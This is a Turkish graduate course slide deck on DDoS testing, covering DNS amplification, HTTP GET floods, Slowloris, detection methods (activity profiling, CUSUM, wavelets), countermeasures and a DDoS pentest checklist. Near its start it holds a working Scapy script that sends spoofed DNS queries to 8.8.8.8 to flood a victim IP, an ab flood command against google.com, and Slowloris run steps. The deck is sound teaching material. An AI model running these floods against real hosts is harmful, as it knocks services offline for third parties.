ddos sızma testleri - 2
TRANSCRIPT
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Servis Dısı Bırakma Testleri - 2BGM 554 - Sızma Testleri ve Guvenlik Denetlemeleri-II
Bilgi Guvenligi MuhendisligiYuksek Lisans Programı
Dr. Ferhat Ozgur [email protected]
Istanbul Sehir Universitesi2016/2017 - Bahar
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Icindekiler
1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek
Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing
4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları
5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
Icindekiler
1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek
Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing
4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları
5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
DNS Amplification I
DNS Amplification
I Yansıtma (Reflection) saldırısıdır. Kurban adresi kullanılarakIP spoofing.
I Sorgu paketleri yaklasık 60 byte, cevap paketleri 3-4 kbyte
I Saldırgan, hedef A kayıdı icin kurban kaynak adresine sahip birDNS istegi gonderir.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
DNS Amplification II
Sekil: DNS Amplification 1
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
DNS Amplification III
Sekil: Spamhouse DDoS Saldırısı 2
1http://blog.sflow.com/2013/10/dns-amplification-attacks.html2https://blog.cloudflare.com/the-ddos-that-knocked-spamhaus-offline-and-
ho/Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
DNS Amplification - Scapy I
#!/usr/bin/python
from scapy.all import *
victimIP = "192.168.4.46"
dnsIP = "8.8.8.8"
while True:
send(IP(dst=dnsIP ,src=victimIP)
/UDP(dport =53)
/DNS(rd=1,qd=DNSQR(qname="www.sehir.edu.tr"))
,verbose =0)
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
DNS Amplification - Scapy II
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
HTTP GET Seli I
HTTP GET Seli
I Sahte olmayan IP adresleri ile bir veya birden fazla makinedenes zamanlı olarak istek gonderilmesi
I Kullanılan araclarI Apache JMeter (Load testing)I AB: Apache HTTP server benchmarking tool
Listing 1: HTTP GET Seli
$ ab -n 10000 -c 500 http ://www.google.com/
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
HTTP GET Seli II
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
HTTP GET Seli III
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
HTTP GET Seli IV
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
Slowloris I
Slowloris/SlowHTTP
I Diger flood saldırı yontemlerinden farklı
I Birden fazla baglatı acar
I Acılan baglantıları olabildigince uzun sekilde acık tutmayacalısır.
I Tamamlanmayan HTTP istekleri gonderir. Hicbir zaman tamdongu olmaz
I Sunucunun ”maximum concurrent connection pool”doldurmaya calısır.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
Slowloris II
How use Slowloris
Requirements:
# sudo apt-get update
# sudo apt-get install perl
# sudo apt-get install libwww-mechanize-shell-perl
# sudo apt-get install perl-mechanize
1)Download slowloris.pl
2)Open Terminal
2)# cd /thePathToYourSlowloris.plFile
3)# ./slowloris.pl
4)# perl slowloris.pl -dns (Victim URL or IP) -options
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
Slowloris III
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DNS Amplification
DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
Slowloris IV
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Icindekiler
1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek
Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing
4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları
5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Giris
DDoS Saldırı Algılama
I DDoS saldırılarını algılama yontemleri genel olarak, daha once trafikpaternlerinin (desenlerinin) izlenmesine dayanır.
I Trafik izlenerek, patern uzerinde meydana gelen beklenmeyendegisiklikler gozlemlenir.
I illegal trafik
I Saldırı: normal ve beklenen trafik uzerinde meydana gelen anormalve dikkat cekici olan sapmalar.
I Kullanılan teknik:I Hizmet kesintiye ugramadan algılamalı.I Hızlı sekilde cevap vermeli.I False-positive oranı dusuk olmalı.
I Kullanılan yontemler:I Activity ProfileI Sequential Change point
I Wavelet analysis
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Active Profiling
Active Profiling
I Activity profile: Belirli bir zaman suresi (ornek 1 sn)icerisinde ag icerisinde gelen paket, istek sayısı
I Paket baslık bilgileri kullanılır.I ProtokolI Src/Dst IPI Src/Dst Port
I Benzer ozelliklere sahip olan istekler farklı kumelere ayrılır.
I Activity level: Bir kumede yer alan network flow’larının sayısıbize o kumenin aktivite sayısını verir. (Belirli bir suredahilinde)
I Activity level icerisinde meydana gelecek artıs bize bir DDoSolabileceginin sinyalini verir.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Active Profiling - Backscatter Analysis Project
Backscatter Analysis Project3
I Amac: DDoS aktivitesini algılamak.
I Saldırganlar kaynak IP adres sahtekarlıgı (src IP spoofing)yapar,
I Kurban, spoof edilmis adrese cevap gonderdir.
I Paketler geri yayılırlar (backscattered)
I Bu calısmada geri-yayılan (backscattered) paketler, kaynak IPadreslerine gore (kurban) kumelenir.
I her bir kume icerisinde aktivite seviyesi, gonderdigi paketlerdeyer alan IP adreslerinin degeridir.
3Moore, David, et al. Inferring internet denial-of-service activity. ACM Transactions on Computer Systems
(TOCS) 24.2 (2006): 115-139.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Active Profiling - Activity Level DDoS Detection I
Activity Level DDoS Detection4
I IP baslıklarında yer alan bazı bilgilerinin entropy ve ki-kare(chi-square) dagılımları hesaplanarak ulasılmaktadır.
I Entropy (Information Theory): Duzensizligin olcusu, n adetbagımsız degisken ve herbirinin secilme olasılıgı pi olsun;H = −
∑ni=1 pi log2 pi
I Kumeler, en cok gorunen kaynak IP adreslerine gore ayrılır.I Kume1: 1 IP adresi.I Kume2: 4 IP adresi.I Kume3: 256 IP adresi.
I Kume4: 4096 IP adresi.I Kumen: Geri kalan butun
kaynak IP adresleri
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Active Profiling - Activity Level DDoS Detection II
4Feinstein, Laura, et al. ”Statistical approaches to DDoS attack detection and response.” DARPA Information
Survivability Conference and Exposition, 2003. Proceedings. Vol. 1. IEEE, 2003.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Sequential Change-Point Detection I
Sequential Change-Point DetectionI Yontem genel olarak saldırılar sonucunda trafik istatistiginde meydana
gelen ani degisimleri algılar.
I Hedef Bilgisayar, hedef port, haberlesme protokolune gore filtrelemeyapar.
I Ag trafigini zaman-serisi seklinde saklar.
I Ag akıs oranında herhangi bir degisiklik oldugunda bunu bilgilendirir.
I CUSUM surekli veriler uzerinde calısan bir degisim noktası tespit
algoritmasıdır.I Esik degeri secimine gore false-positive veya algılama gecikmesi
yasanabilir.
fn =
[fn−1 +
µ1 − µ0
σ2
(yn −
µ1 + µ0
2
)](1)
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Sequential Change-Point Detection II
Sekil: DDos Saldırısı5
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Sequential Change-Point Detection III
5Wang, Shangguang, et al. ”Detecting SYN flooding attacks based on traffic prediction.” Security and
Communication Networks 5.10 (2012): 1131-1140.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest Giris
Active ProfilingSequential Change-PointDalgacık Analizi
Dalgacık Analizi (Wavelet Analysis)
Sekil: Dalgacık Analizi 6
6http://groups.geni.net/geni/wiki/FirstGenBrooksDr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Icindekiler
1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek
Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing
4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları
5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Karsı Onlemler
Karsı Onlemler
I Saldırının absorbe edilmesi
I Servis hizmetinin azaltılması
I Hizmetin kapatılması
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Saldırıyı Absorbe Etmek
Saldırıyı Absorbe Etmek
I Ek kapasiteye ihtiyac duyulur.
I Daha onceden planlama ve cozumun gerceklestirilmis olmasıgerekir.
I Kapasitenin eklenmesiyle ilgili dogrudan ve devam edenmaliyetlerin bilincinde olmamız gerekir
I computing, storage, network equipment, standby servers,replication of data
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Servis Hizmetinin Azaltılması
Servis Hizmetinin Azaltılması
I Saldırı esnasında butun servislerin ayakta ve calısır haldeolması gerekmeyebilir.
I Kritik isletme fonksiyonlarını yerine getiren bilisim sistemleridegerlendirilmeli
I Bunların DoS saldırısına karsı korunması icin stratejibelirlenmelidir.
I Sunulan hizmetlerden alt kumeler olusacak sekilde (orn: kritikservisler)
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Hizmetin Kapatılması
Hizmetin Kapatılması
I Zarar, kontrolun otesine gectiginde, tum servisleri planlı birsekilde kapatmak ve ardından asamalı bir sekilde normaledonmek en iyisidir.
I Tum saldırılara karsı koruma saglamak icin kolay bir yol veyatek bir yol yoktur.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Ingress Filtering
Ingress Filtering
I Tanım: gelen paketlerin aslında kaynak olduklarını iddia edenaglardan geldigine emin olmak icin kullanılan bir tekniktir.
I Paketler ag’ınız icerisine alınmadan once dogru olmayanadreslere sahiplerse, bunları filtreleyin.
I Mesru (legitimate) kaynak IP
I Bilinen IP adreslerinden gelen saldırıları engellemez.
I Saldırganın sahte kaynak IP adreslerinden saldırı baslatmasınıyasaklar.
I Bu filtreleme, kaynak adresi izlememize yardımcı olur.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Egress Filtering
Egress Filtering
I Agdan ayrılan IP paket ustbilgileri gecerli kriterleri karsılayıpkarsılamadıklarını kontrol etmek icin taranır.
I Kriterleri karsılayan paketlerin agın dısına cıkmasına izinverilecektir
I Sahte IP adresleri bulunan bircok DDoS paketi iptal edilir.
I Yetkisiz veya kotu niyetli trafigin ev agından ayrılmasına izinvermez.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Ingress - Egress Filtering
Sekil: Ingress - Egress Filtering 7
7http://1100029f.blogspot.com.tr/2012/04/ccd2c01-p02-1100029f.htmlDr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
TCP Intercept I
TCP Intercept
I TCP sunucularını SYN flood saldırılarından korumak icintasarlanmıstır.
I TCP Intercept yazılımları, istemci tarafından gonderilen SYNpaketlerini keser, eger istemci erisim listesinde (access list) yeralırsa baglantıyı izin verir.
I Aynı sekilde sunucu ile istemcinin yerine iletisime gecerbaglantı kurulduktan sonra aradan cekilir.
I Sahte istemci baglantı isteklerinin sunucuya ulasmasınıengeller.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
TCP Intercept II
Sekil: TCP Intercept 8
8http://flylib.com/books/en/2.464.1.51/1/Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Honeypots
Honeypots
I Honeypots: Sahte bilgisayar sistemleriI Yem olarak kurulurlarI Saldırganlar hakkında bilgi toplamak icin kullanılır.
I Sınırlı guvenlik ayarlarına sahip sistemlerI Saldırganı cekmekI Footprint tanımakI Ana Sunucuyu korumak
I Saldırganların dikkatini ana sunucu yerine bunlarayonlendirmek icin kullanılır.
I Saldırı yontemleri, teknikleri vb. hakkında yeterli bilginin eldeedilebilmesi icin ana sunucuların hemen hemen tumozelliklerine sahip olmalı.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Honeypots Turleri
Honeypots Turleri
I High interaction honeypotsI Gercek zafiyet iceren hizmetler ve yazılımlar icerir.I Gercek isletim sistemleri ve uygulamalar icerirler.I Saldırının, sızma saldırısının veya zararlı yazılımın gercek
ortamda nasıl calısacagına ulasılır.I Honeynets: tuzak da dahil olmak uzere tum bilgisayar agının
tum duzenini iceren altyapıdır ve saldırı ayrıntılarını yakalarlar.I http://project.honeynet.org
I Low interaction honeypotsI Saldırgan veya zararlı yazılımla kısıtlı etkilesime girenlerI sunulan butun servisler taklit (emulate) edilir.I Kendisi zafiyet icermemekte, dolayısıyla somuruler (exploits)
sonucunda enfekte olmayacaktır.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
Load-Balancing
Load-Balancing
I Isi, iki ya da daha fazla bilgisayar, islemci, sabit disk ya dadiger kaynaklar arasında paylastırma teknolojisidir. 9
I En iyi kaynak kullanımı, en yuksek islem hacmi, en dusukcevap suresi saglanabilir; olusabilecek asırıyuklemeden(overload) kurtulunabilir.
9https://tr.wikipedia.org/wiki/Yuk dengelemeDr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest
Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering
Egress FilteringTCP InterceptHoneypotsLoad-Balancing
DDoS’a Karsı Cozumler (SANS)
Sekil: SANS DDoS Protection 10
10https://www.sans.org/reading-room/whitepapers/firewalls/leveraging-load-balancer-fight-ddos-33408
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest RFC 3704 Filtreleme Gelismis Koruma Aracları
Icindekiler
1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek
Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing
4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları
5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest RFC 3704 Filtreleme Gelismis Koruma Aracları
RFC 3704 Filtreleme
RFC 3704 Filtreleme
I RFC 3704: Ingress Filtering for Multihomed NetworksI Black hole filtering
I Gelen veya giden trafigin silindigi (veya ”dustugu”) agdakiyerleri ifade eder, kaynaga verilerin hedeflenen alıcıyaulasmadıgına dair bilgi vermez.
I Servis saglayıcılar tarafından genellikle erisim listeleriuygulanmadan trafik filtrelemesi icin kullanılan bir tekniktir.
I Ornekler: ”packets destined to 192.168.1.1 are discarded”,”Disable ICMP unreachable packets”
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest RFC 3704 Filtreleme Gelismis Koruma Aracları
Gelismis Koruma Aracları
Araclar
I DDoS Protector
I FortiDDoS appliances
I Arbor Pravail Availability Protection System
I Cisco Guard XT
I Wanguard
I SDL Regex Fuzzer
I NetFlow Analyzer
I Netscaler application firewall
I AntiDDoS Guardian
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DDoS Pentest
Gelismis DDoS KorumaYontemi
Icindekiler
1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek
Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing
4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları
5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DDoS Pentest
Gelismis DDoS KorumaYontemi
DDoS Pentest I
1 Pentest’in amacı ve planını tanımlayın2 Sunucu veya uygulama uzerinde yapay istekler olusturarak yuk
testi (load test) gerceklestirinI Webserver Stress Tool, Web Stress Tester, JMeter
3 Agı tarayarak DoS acıklarını kontrol edin. Nmap, GFILANGuard veya Nessus gibi aracları kullanabilirsiniz.
4 Hedefi baglantı istek paketleriyle bogarak sunucuda SYNsaldırısı yapın. Araclar: DoS HTTP, Sprut
5 Sunucu uzerine cok sayıda TCP veya UDP paket gondererek”port flooding” saldırısı yapın. Araclar: Pepsi5, Mutilate
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DDoS Pentest
Gelismis DDoS KorumaYontemi
DDoS Pentest II
6 E-posta sunucusunda, e-posta bombardımanı calıstırın.Araclar: Mail Bomber, Advanced Mail Bomber
7 Web sitesi formlarını ve ziyaretci defterini keyfi ve uzungirdileri kullanarak sahte girislerle doldurun.
8 Son olarak, tum bulguları belgeleyin ve belirlenen sorunlarıncozumunde bir sonraki adımları baslatın.
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2
DDoS Saldırıları (Devam)DDoS Saldırı Algılama
Karsı Onlemler
BotNet Karsı OnlemlerDDoS Pentest DDoS Pentest
Gelismis DDoS KorumaYontemi
Gelismis DDoS Koruma Yontemi
Gelismis DDoS Koruma Yontemi
1 Ag ortamını degerlendirin ve bir savunma planı gerceklestirin
2 Kapsamlı ve katmanlı bir DDoS stratejisi gelistirin
3 Altyapı (infrastructure) duzeyinde kontrol uygulayın
4 DNS sunucularını ve diger kritik altyapıyı koruyun
5 Kurum ici ozel DDoS aracları uygulayın
Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2